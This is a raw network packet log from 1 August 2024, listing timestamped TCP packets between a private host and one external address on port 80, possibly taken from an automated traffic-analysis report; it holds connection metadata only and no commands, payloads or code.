Aug 1, 2024 04:28:29.050622940 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.393357992 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.399122000 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.399204969 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.399235010 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.859499931 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:29.963813066 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:29.991353989 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:30.145586967 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.005543947 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.005856037 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.011399984 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.011487007 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.011619091 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.011683941 CEST	80	49757	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.011737108 CEST	49757	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.016928911 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.362543106 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.367782116 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.367815971 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.367842913 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.825311899 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:31.955735922 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:31.957824945 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.078197956 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.078501940 CEST	49759	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.083750963 CEST	80	49758	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.083831072 CEST	49758	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.083901882 CEST	80	49759	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.083986998 CEST	49759	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.084060907 CEST	49759	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.089036942 CEST	80	49759	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.440689087 CEST	49759	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.447751999 CEST	80	49759	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.447792053 CEST	80	49759	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.447822094 CEST	80	49759	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.816034079 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.821372986 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.821604013 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.821604967 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.826766014 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.850487947 CEST	49759	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:32.856110096 CEST	80	49759	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:32.856184006 CEST	49759	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:33.285335064 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:33.290493011 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:33.290555000 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:33.612303019 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:33.790720940 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:33.790924072 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.185820103 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.191340923 CEST	80	49760	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:34.191502094 CEST	49760	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.207366943 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.213011026 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:34.213232040 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.215106010 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.220380068 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:34.565407038 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:34.570861101 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:34.570895910 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:34.570926905 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.019808054 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.143450975 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.197246075 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.252782106 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.319360018 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.319755077 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.325164080 CEST	80	49761	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.325418949 CEST	49761	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.325864077 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.326059103 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.326060057 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.332895994 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.674948931 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:35.680682898 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.680721045 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:35.680748940 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:36.118098021 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:36.252648115 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:36.252756119 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:36.354053020 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.052563906 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.052974939 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.058211088 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:38.058252096 CEST	80	49762	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:38.058326960 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.058386087 CEST	49762	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.058491945 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.063458920 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:38.409181118 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:38.416330099 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:38.416368008 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:38.416394949 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:38.885725975 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.024631977 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.024863005 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.075939894 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.082695961 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.082863092 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.082931995 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.087702036 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.141386986 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.146372080 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.146636963 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.146636963 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.157424927 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.441781998 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.446800947 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.446856022 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.502939939 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:39.512217045 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.512233973 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.512248039 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.926704884 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:39.949520111 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:40.067157030 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:40.067553997 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:40.081511021 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:40.081743002 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.313869953 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.313870907 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.313983917 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.319612980 CEST	80	49763	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.319833994 CEST	49763	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.320050001 CEST	80	49765	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.320080042 CEST	80	49764	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.320249081 CEST	49764	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.320251942 CEST	49765	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.345402002 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.350635052 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.350894928 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.350894928 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.355882883 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.706020117 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:41.712862015 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.712913990 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:41.712941885 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.172766924 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.305392981 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.305602074 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.486845016 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.487561941 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.492913008 CEST	80	49766	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.493154049 CEST	49766	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.493268967 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.493480921 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.493480921 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.499557018 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.848356009 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:42.853581905 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.853604078 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:42.853616953 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:43.289576054 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:43.468014956 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:43.468101025 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.598846912 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.599533081 CEST	49768	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.604588032 CEST	80	49767	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:44.604629993 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:44.604866982 CEST	49767	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.604866982 CEST	49768	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.604968071 CEST	49768	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.610393047 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:44.956042051 CEST	49768	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:44.961477995 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:44.961515903 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:44.961546898 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.082516909 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.083482981 CEST	49768	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.087762117 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.087907076 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.088018894 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.093163967 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.128684044 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.151582956 CEST	80	49768	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.151664972 CEST	49768	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.268030882 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.273016930 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.273138046 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.273287058 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.278707027 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.442682028 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.448020935 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.448160887 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.627814054 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:45.633076906 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.633116007 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.633173943 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.895598888 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:45.955918074 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.023324013 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.069933891 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.143260956 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.143310070 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.203649044 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.252671957 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.354981899 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.354981899 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.355510950 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.360608101 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.360938072 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.363179922 CEST	80	49769	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.363250017 CEST	80	49770	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.363262892 CEST	49769	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.363343954 CEST	49770	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.364351988 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.369237900 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.723465919 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:46.728763103 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.728790045 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:46.728806019 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:47.165344000 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:47.315305948 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.348716021 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:47.424628019 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.876822948 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.882219076 CEST	80	49771	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:47.882302046 CEST	49771	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.938962936 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.943928957 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:47.944015980 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.944209099 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:47.948952913 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:48.300312996 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:48.305500031 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:48.305515051 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:48.305526972 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:48.767235041 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:48.945471048 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:48.948945045 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.300538063 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.301172018 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.306050062 CEST	80	49772	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:49.306087017 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:49.306190014 CEST	49772	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.306245089 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.306524038 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.312623024 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:49.660434961 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:49.665654898 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:49.665690899 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:49.665721893 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:50.120312929 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:50.251307011 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:50.251636982 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.187750101 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.191721916 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.192998886 CEST	80	49773	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.193067074 CEST	49773	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.196561098 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.196841002 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.197138071 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.202002048 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.306385040 CEST	49775	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.311480999 CEST	80	49775	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.311698914 CEST	49775	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.311700106 CEST	49775	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.317087889 CEST	80	49775	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.550384998 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.555665016 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.555697918 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.555723906 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.659097910 CEST	49775	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:51.665184975 CEST	80	49775	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:51.665680885 CEST	80	49775	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.019542933 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.113900900 CEST	80	49775	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.127769947 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.200499058 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.201561928 CEST	49775	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.207408905 CEST	80	49775	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.207524061 CEST	49775	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.315296888 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.330825090 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.331655979 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.336714029 CEST	80	49774	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.336755991 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.336834908 CEST	49774	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.336874962 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.336977005 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.341983080 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.690565109 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:52.695812941 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.695843935 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:52.695878029 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.138564110 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.252654076 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.269494057 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.455807924 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.486387014 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.491106987 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.491730928 CEST	80	49776	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.491947889 CEST	49776	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.496077061 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.496304989 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.496398926 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.501277924 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.846669912 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:53.851761103 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.851798058 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:53.852140903 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:54.306552887 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:54.424545050 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.443778038 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:54.627762079 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.699135065 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.704415083 CEST	80	49777	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:54.705018997 CEST	49777	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.715157032 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.720267057 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:54.721050024 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.721050978 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:54.726567030 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:55.065433979 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:55.070676088 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:55.070751905 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:55.070800066 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:55.505470991 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:55.627796888 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:55.685601950 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:55.815157890 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.072304010 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.072632074 CEST	49779	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.254371881 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.295983076 CEST	80	49779	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.296020031 CEST	80	49780	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.296049118 CEST	80	49778	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.296096087 CEST	49779	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.296452999 CEST	49778	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.296452999 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.296452999 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.304689884 CEST	80	49780	194.58.42.154	192.168.2.4
